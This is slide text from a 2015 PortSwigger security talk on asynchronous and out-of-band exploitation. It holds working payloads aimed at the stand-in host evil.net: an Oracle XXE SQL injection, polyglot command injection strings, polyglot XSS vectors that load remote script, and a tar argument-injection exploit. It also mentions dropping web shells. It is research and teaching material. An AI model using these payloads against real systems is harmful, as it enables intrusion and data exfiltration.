2015 All Rights Reserved SQLi: ORACLE • UTL_HTTP, UTL_TCP, UTL_SMTP, UTL_INADDR, UTL_FILE… • Require assorted privileges • SELECT extractvalue(xmltype('<?xml version="1.0" encoding="UTF-‐8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://evil.net/"> %remote;]>'),'/l') • From https://bog.netspi.com/advisory-‐xxe-‐injection-‐oracle-‐database-‐cve-‐2014-‐ 6577/ • No privileges required! • Patched eventually
16.
©PortSwigger Ltd
2015 All Rights Reserved SQLi: MySQL • LOAD_FILE('evil.netfoo') • Windows only • SELECT … INTO OUTFILE 'evil.netfoo' • Windows only
17.
©PortSwigger Ltd
2015 All Rights Reserved WRITE-‐BASED CALLBACKS • Drop web shell • Requires path • Risky • Maildrop • Microsoft Outlook only • Printer spool • Requires employee credulity • Requires root • Bypasses outbound network filtering • Config files?
18.
©PortSwigger Ltd
2015 All Rights Reserved CONFIG File Name /etc/my.cnf /etc/mysql/my.cnf SYSCONFDIR/my.cnf $MYSQL_HOME/my.cnf ~/.my.cnf Command- Line Format --bind-address=addr Permitted Values Type string Default 0.0.0.0 “If addr is a host name, the server resolves the name to an IPv4 address and binds to that address.”
19.
©PortSwigger Ltd
2015 All Rights Reserved ASYNCHRONOUS COMMAND INJECTION •Bash: $ command arg1 input arg3 $ command arg1 'input' arg3 $ command arg1 "input" arg3 •Windows: >command arg1 input arg3 >command arg1 "input" arg3
20.
©PortSwigger Ltd
2015 All Rights Reserved POLYGLOT COMMAND INJECTION
21.
©PortSwigger Ltd
2015 All Rights Reserved POLYGLOT COMMAND INJECTION
22.
©PortSwigger Ltd
2015 All Rights Reserved POLYGLOT COMMAND INJECTION
23.
©PortSwigger Ltd
2015 All Rights Reserved POLYGLOT COMMAND INJECTION
24.
©PortSwigger Ltd
2015 All Rights Reserved &nslookup evil.net&'"`0&nslookup evil.net&`' bash : &nslookup evil.net&'"`0&nslookup evil.net&`' bash ": &nslookup evil.net&'"`0&nslookup evil.net&`' bash ': &nslookup evil.net&'"`0&nslookup evil.net&`' win : &nslookup evil.net&'"`0&nslookup evil.net&`' win ": &nslookup evil.net&'"`0&nslookup evil.net&`' Key: ignored context-‐breakoutdud-‐statement injected-‐command ignored
25.
©PortSwigger Ltd
2015 All Rights Reserved POLYGLOT XSS • “One vector to rule them all” by @garethheyes javascript:/*-- >]]>%>?></script></title></textarea></noscript></style></xmp>"> [img=1,name=/alert(1)/.source]<img - /style=a:expression(/*'/- /*',/**/eval(name)/*%2A///*///);width:100%;height:100%;p osition:absolute;-ms-behavior:url(#default#time2) name=alert(1) onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=eval(name) onmouseover=eval(name) onbegin=eval(name) background=javascript:eval(name)//>" •Problems: • Length • Fragile
26.
©PortSwigger Ltd
2015 All Rights Reserved POLYGLOT XSS </script><svg/onload= '+/"/+/onmouseover=1/ +(s=document.createElement(/script/.source), s.stack=Error().stack, s.src=(/,/+/evil.net/).slice(2), document.documentElement.appendChild(s))//'>
27.
©PortSwigger Ltd
2015 All Rights Reserved BLIND XSS • Sleepy Puppy • Allows custom script+payload injection • Webserver in docker container • https://github.com/Netflix/sleepy-‐puppy
28.
©PortSwigger Ltd
2015 All Rights Reserved PROOF OF EXPLOIT Scenario: you can upload [anything].jpg Hypothesis: images archived with 'tar [options] *' The exploit: -‐-‐use-‐compress-‐program=nslookup evil.net -‐domain=a.jpg Variants exist for targeting zip, rsync, etc
29.
©PortSwigger Ltd
2015 All Rights Reserved ---LIVE DEMO---
30.
©PortSwigger Ltd
2015 All Rights Reserved HAZARDS •Friendly fire •URL grepping •Scope
31.
©PortSwigger Ltd
2015 All Rights Reserved TAKE-‐AWAYS Asynchronous exploits fail silently Quality of Payload is crucial Invisible ⇏ unhackable @albinowax james.kettle@portswigger.net
Jetzt herunterladen